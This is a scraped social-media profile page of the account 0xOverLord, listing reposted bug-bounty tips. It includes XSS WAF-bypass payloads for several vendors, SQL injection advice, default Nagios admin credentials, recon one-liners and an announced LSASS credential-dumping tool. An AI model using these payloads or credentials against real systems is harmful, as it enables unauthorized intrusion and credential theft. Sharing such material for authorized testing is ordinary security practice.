@0xOver Profile picture

0xOverLord

@0xOver

Joined January 2020
Similar User
Ac1d photo

@AssassinUKG

babonaz photo

@babonaz

Pramod Yadav photo

@cyberindia3

Behnam photo

@bdasec_

Naivedya Pandey photo

@tech_naivi

Arun Joseph photo

@ArunJoseph_AJ

woodspeed photo

@wucpi

Dragos photo

@_Drag0s_

bluered1011 photo

@bugbluered1011

POPOPRET photo

@p0p0pr3t

Mohamed Aly photo

@alydemah

Harsh photo

@gokuKaioKen_

ankit dobhal photo

@arjundobal96

M007 photo

@heiye007

David S 🇺🇸 photo

@CryptoHackz

0xOverLord Reposted

🚨 Tool Release! Announcing 4oFour, a command-line utility tool written in Go that helps enumerate technology stacks used by a target based on the unique 404 error pages they generate and that too blazingly fast! ✨ Repo: github.com/umair9747/4oFo…

0x9747's tweet image. 🚨 Tool Release! 
Announcing 4oFour, a command-line utility tool written in Go that helps enumerate technology stacks used by a target based on the unique 404 error pages they generate and that too blazingly fast! ✨ 

Repo: <a style="text-decoration: none;" rel="nofollow" target="_blank" href="https://t.co/mBHLeJfSkJ">github.com/umair9747/4oFo…</a>

0xOverLord Reposted

XSS WAF Bypass: Imperva <details/open/id="&quote;"ontoggle=[JS]> Amazon <details/open/id="&quote;"ontoggle=[JS]> Akamai <details open id="' &quote;'"ontoggle=[JS]>

HackingTeam777's tweet image. XSS WAF Bypass: 

Imperva
&lt;details/open/id="&amp;quote;"ontoggle=[JS]&gt;

Amazon
&lt;details/open/id="&amp;quote;"ontoggle=[JS]&gt;

Akamai
&lt;details open id="' &amp;quote;'"ontoggle=[JS]&gt;

0xOverLord Reposted
bountywriteups's tweet image.

0xOverLord Reposted

🦀 Introducing 𝗥𝘂𝘀𝘁𝗶𝘃𝗲𝗗𝘂𝗺𝗽—LSASS memory dumper in pure Rust, using 𝗼𝗻𝗹𝘆 𝗡𝗧 𝗔𝗣𝗜𝘀, creating a 𝗺𝗶𝗻𝗶𝗺𝗮𝗹 𝗺𝗶𝗻𝗶𝗱𝘂𝗺𝗽 from scratch, with no std, no CRT, and just 𝟭𝟴𝗞𝗕! github.com/safedv/Rustive… #redteam #CyberSecurity


0xOverLord Reposted

🐞Use Burpsuite like Pro by @daffainfo Match and Replace Feature which is not known by many hunters or doesn't use it at all. Source: github.com/daffainfo/matc… #bugbounty #bugbountytips #burpsuite #pentesting #cybersecurity #hacking #ethicalhacking #xss #wafbypass #waf

KonwarAbhi98099's tweet image. 🐞Use Burpsuite like Pro by @daffainfo 

Match and Replace Feature which is not known by many hunters or doesn't use it at all.

Source:
<a style="text-decoration: none;" rel="nofollow" target="_blank" href="https://t.co/LQDy4rXnuC">github.com/daffainfo/matc…</a>

#bugbounty #bugbountytips #burpsuite #pentesting #cybersecurity #hacking #ethicalhacking #xss #wafbypass #waf
KonwarAbhi98099's tweet image. 🐞Use Burpsuite like Pro by @daffainfo 

Match and Replace Feature which is not known by many hunters or doesn't use it at all.

Source:
<a style="text-decoration: none;" rel="nofollow" target="_blank" href="https://t.co/LQDy4rXnuC">github.com/daffainfo/matc…</a>

#bugbounty #bugbountytips #burpsuite #pentesting #cybersecurity #hacking #ethicalhacking #xss #wafbypass #waf
KonwarAbhi98099's tweet image. 🐞Use Burpsuite like Pro by @daffainfo 

Match and Replace Feature which is not known by many hunters or doesn't use it at all.

Source:
<a style="text-decoration: none;" rel="nofollow" target="_blank" href="https://t.co/LQDy4rXnuC">github.com/daffainfo/matc…</a>

#bugbounty #bugbountytips #burpsuite #pentesting #cybersecurity #hacking #ethicalhacking #xss #wafbypass #waf
KonwarAbhi98099's tweet image. 🐞Use Burpsuite like Pro by @daffainfo 

Match and Replace Feature which is not known by many hunters or doesn't use it at all.

Source:
<a style="text-decoration: none;" rel="nofollow" target="_blank" href="https://t.co/LQDy4rXnuC">github.com/daffainfo/matc…</a>

#bugbounty #bugbountytips #burpsuite #pentesting #cybersecurity #hacking #ethicalhacking #xss #wafbypass #waf

0xOverLord Reposted

Great Google Hacking Tool! for finding #XSS and open redirect vulnerability, use it for FREE at seckrd.com/google-hacking #bugbountytips #BugBounty #infosec

s3c_krd's tweet image. Great Google Hacking Tool! for finding #XSS and open redirect vulnerability, use it for FREE at 
<a style="text-decoration: none;" rel="nofollow" target="_blank" href="https://t.co/PxljBwt28r">seckrd.com/google-hacking</a>
#bugbountytips #BugBounty #infosec

0xOverLord Reposted

Found 2 SQLis from a same group of companies in a self-BBP. Initially I found this boolean injection like 5 days ago, but took sometime to exploit it. Finally its done and dusted today. Read the thread: #BugBounty #bugbountytips #SQLi #SQLInjection 1/3

nav1n0x's tweet image. Found 2 SQLis from a same group of companies in a self-BBP. Initially I found this boolean injection like 5 days ago, but took sometime to exploit it. Finally its done and dusted today.  Read the thread:
#BugBounty #bugbountytips #SQLi #SQLInjection
1/3

0xOverLord Reposted

Wordlist for fuzzing hidden database files github.com/dkcyberz/Harpy… Credits: @KonwarAbhi98099 #BugBounty #bugbountytips

RootMoksha's tweet image. Wordlist for fuzzing hidden database files

<a style="text-decoration: none;" rel="nofollow" target="_blank" href="https://t.co/a9xp6hvwE0">github.com/dkcyberz/Harpy…</a>

Credits: @KonwarAbhi98099 

#BugBounty #bugbountytips

0xOverLord Reposted

Nuclei Template : REFLECTION Potential XSS, SSRF, Cache Poisoning, Open URL Redirection & OAUTH Redirection nuclei -t reflection[.]yaml -u target #bugbountytips #bugbounty github.com/schooldropout1…

's tweet image. Nuclei Template : REFLECTION

Potential XSS, SSRF, Cache Poisoning, Open URL Redirection &amp; OAUTH Redirection

nuclei -t reflection[.]yaml -u target

#bugbountytips #bugbounty

<a style="text-decoration: none;" rel="nofollow" target="_blank" href="https://t.co/dKYr5SU8aY">github.com/schooldropout1…</a>
's tweet image. Nuclei Template : REFLECTION

Potential XSS, SSRF, Cache Poisoning, Open URL Redirection &amp; OAUTH Redirection

nuclei -t reflection[.]yaml -u target

#bugbountytips #bugbounty

<a style="text-decoration: none;" rel="nofollow" target="_blank" href="https://t.co/dKYr5SU8aY">github.com/schooldropout1…</a>

0xOverLord Reposted

If you have a JSON login page, test blind-SQL injection directly in the username and/or password fields like below. #BugBounty #SQLInjection #bugbountytips Payload injected in username input field:

's tweet image. If you have a JSON login page, test blind-SQL injection directly in the username and/or password fields like below. #BugBounty #SQLInjection #bugbountytips 

Payload injected in username input field:

0xOverLord Reposted

🔰 Find subdomains using RapidDNS 📃 Add this small function into your .bash_profile to quickly find subdomains using RapidDNS API: rapiddns(){ curl -s "rapiddns.io/subdomain/\?full=1" \ | grep -oP '_blank">\K[^<]*' \ | grep -v http \ | sort -u } We can then use it like…

bountywriteups's tweet image. 🔰 Find subdomains using RapidDNS

📃 Add this small function into your .bash_profile to quickly find subdomains using RapidDNS API:

rapiddns(){
curl -s "<a style="text-decoration: none;" rel="nofollow" target="_blank" href="https://t.co/eGELZ6KZBs">rapiddns.io/subdomain/</a>\?full=1" \
 | grep -oP '_blank"&gt;\K[^&lt;]*' \
 | grep -v http \
 | sort -u
}
We can then use it like…

0xOverLord Reposted

🚨 I found the coolest #SQLi on a target! Surprisingly, the SQLi was in the "ignore cookies" button of the cookie banner. As I always say and do, don’t just look for SQLis in parameters. Check uncommon places like cookie banners, cookie accept buttons, etc. #BugBounty

nav1n0x's tweet image. 🚨 I found the coolest #SQLi on a target! Surprisingly, the SQLi was in the "ignore cookies" button of the cookie banner.  As I always say and do, don’t just look for SQLis in parameters. Check uncommon places like cookie banners, cookie accept buttons, etc. #BugBounty…
nav1n0x's tweet image. 🚨 I found the coolest #SQLi on a target! Surprisingly, the SQLi was in the "ignore cookies" button of the cookie banner.  As I always say and do, don’t just look for SQLis in parameters. Check uncommon places like cookie banners, cookie accept buttons, etc. #BugBounty…

0xOverLord Reposted

Add 'Pagos.tar.gz' to the wordlist , and maybe you will get juicy data😎 credit: @cysky0x1 #bugbounty #bugbountytip

WllGates's tweet image. Add 'Pagos.tar.gz' to the wordlist , and maybe you will get juicy data😎 

credit: @cysky0x1 

#bugbounty #bugbountytip

0xOverLord Reposted

🔥Cloudflare XSS bypass : ">%20<img src=o onerror=alert``>// github.com/Edr4/XSS-Bypas… credit: @m0uka_Dz #Bugbountytips

WllGates's tweet image. 🔥Cloudflare XSS  bypass :

"&gt;%20&lt;img src=o onerror=alert``&gt;//

<a style="text-decoration: none;" rel="nofollow" target="_blank" href="https://t.co/1eM4MDA8Br">github.com/Edr4/XSS-Bypas</a>…

credit: @m0uka_Dz 

#Bugbountytips

0xOverLord Reposted

Easy P1 nagios web console Default login credentials 🔐 username="nagiosadmin" password="nagiosadmin" credit: @cysky0x1 #bugbountytips

WllGates's tweet image. Easy P1 nagios web console Default login credentials 🔐

username="nagiosadmin"
password="nagiosadmin"

credit: @cysky0x1 

#bugbountytips

0xOverLord Reposted

🦠 PenTesting  Advanced Course 🦠MR.DEVIL 🤧 ◾️ Advanced methods of PenTesting with practicals ◾️ 📍 Link: mega.nz/folder/liQBxQL…


0xOverLord Reposted

Arjun + KXSS Finding - Parameter - XSS arjun -q -u target -oT arjun && cat arjun | awk -F'[?&]' '{baseUrl=$1; for(i=2; i<=NF; i++) {split($i, param, "="); print baseUrl "?" param[1] "="}}' | kxss By:@gudetama_bf #bugbountytips #bugbounty

RootMoksha's tweet image. Arjun + KXSS

Finding 
- Parameter
- XSS

arjun -q -u target -oT arjun &amp;&amp; cat arjun | awk -F'[?&amp;]' '{baseUrl=$1; for(i=2; i&lt;=NF; i++) {split($i, param, "="); print baseUrl "?" param[1] "="}}' | kxss
By:@gudetama_bf 

#bugbountytips #bugbounty

0xOverLord Reposted

Get a list of subdomains from a target with subfinder, use httpx to find which ones have open web ports that are browsable, then spider those domains with hakrawler to find all the pages! By:@hakluke #bugbountytips #bugbounty

RootMoksha's tweet image. Get a list of subdomains from a target with subfinder, use httpx to find which ones have open web ports that are browsable, then spider those domains with hakrawler to find all the pages! 

By:@hakluke 

#bugbountytips #bugbounty

0xOverLord Reposted

Stop running the Python web server in the root directory. it is funny because most of these IPs are related to C&C LOl #infosec #cyberattack

h4x0r_dz's tweet image. Stop running the Python web server in the root directory.

 it is funny because most of these IPs are related to C&amp;C LOl 
#infosec #cyberattack
h4x0r_dz's tweet image. Stop running the Python web server in the root directory.

 it is funny because most of these IPs are related to C&amp;C LOl 
#infosec #cyberattack

0xOverLord Reposted

Top 15 - Vulnerability Scanners List ;

pwn4arn's tweet image. Top 15 - Vulnerability Scanners List ;

Loading...

Something went wrong.


Something went wrong.